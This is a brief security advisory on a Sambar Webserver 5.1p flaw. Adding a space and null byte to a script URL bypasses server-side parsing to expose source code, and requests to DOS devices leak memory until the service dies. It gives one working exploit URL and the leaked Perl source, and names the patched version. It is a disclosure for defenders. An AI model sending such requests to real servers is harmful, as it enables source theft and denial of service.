COMMAND

	Sambar webserver server-side fileparsing bypassed

SYSTEMS AFFECTED

	 Sambar Webserver V5.1p on Windows 2000

	 (Other versions were not tested)

	

PROBLEM

	In Peter Gründl of KPMG Denmark advisory [BUG-ID: 2002012] :
	

	It is possible to bypass the serverside  parsing  of  scripts,  such  as
	.pl, .jsp, .asp, .stm and download the sourcecode.  The  bypassing  also
	opens up for a request to certain  DOS-devices  that  the  server  would
	then attempt to access. These ressources used in such requests  are  not
	freed properly and as a result, the web server will eventually  run  out
	of memory and the operating system will kill the web service.
	

	To bypass the serverside parsing, an attacker would have to  access  the
	ressource with a suffix of <space><null>. There are a lot of  ways
	to achieve this in eg. Internet Explorer, and an example  of  sourcecode
	exposure could be:
	

	http://server/cgi-bin/environ.pl+%00

	

	which would return the following (perl sourcecode):
	

	read(STDIN, $CONTENT, $ENV{\'CONTENT_LENGTH\'});

	print< GATEWAY_INTERFACE: $ENV{\'GATEWAY_INTERFACE\'}

	PATH_INFO:  $ENV{\'PATH_INFO\'}

	PATH_TRANSLATED:  $ENV{\'PATH_TRANSLATED\'}

	QUERY_STRING:  $ENV{\'QUERY_STRING\'}

	REMOTE_ADDR:  $ENV{\'REMOTE_ADDR\'}

	REMOTE_HOST:  $ENV{\'REMOTE_HOST\'}

	REMOTE_USER:  $ENV{\'REMOTE_USER\'}

	REQUEST_METHOD:  $ENV{\'REQUEST_METHOD\'}

	DOCUMENT_NAME:  $ENV{\'DOCUMENT_NAME\'}

	DOCUMENT_URI:  $ENV{\'DOCUMENT_URI\'}

	SCRIPT_NAME:  $ENV{\'SCRIPT_NAME\'}

	SCRIPT_FILENAME:  $ENV{\'SCRIPT_FILENAME\'}

	SERVER_NAME:  $ENV{\'SERVER_NAME\'}

	SERVER_PORT:  $ENV{\'SERVER_PORT\'}

	SERVER_PROTOCOL:  $ENV{\'SERVER_PROTOCOL\'}

	SERVER_SOFTWARE:  $ENV{\'SERVER_SOFTWARE\'}

	CONTENT_LENGTH:  $ENV{\'CONTENT_LENGTH\'}

	CONTENT:  $CONTENT

	END

	

SOLUTION

	Get Version 5.2b, which is available here:
	

	http://sambar.dnsalias.org/win32-preview.tar.gz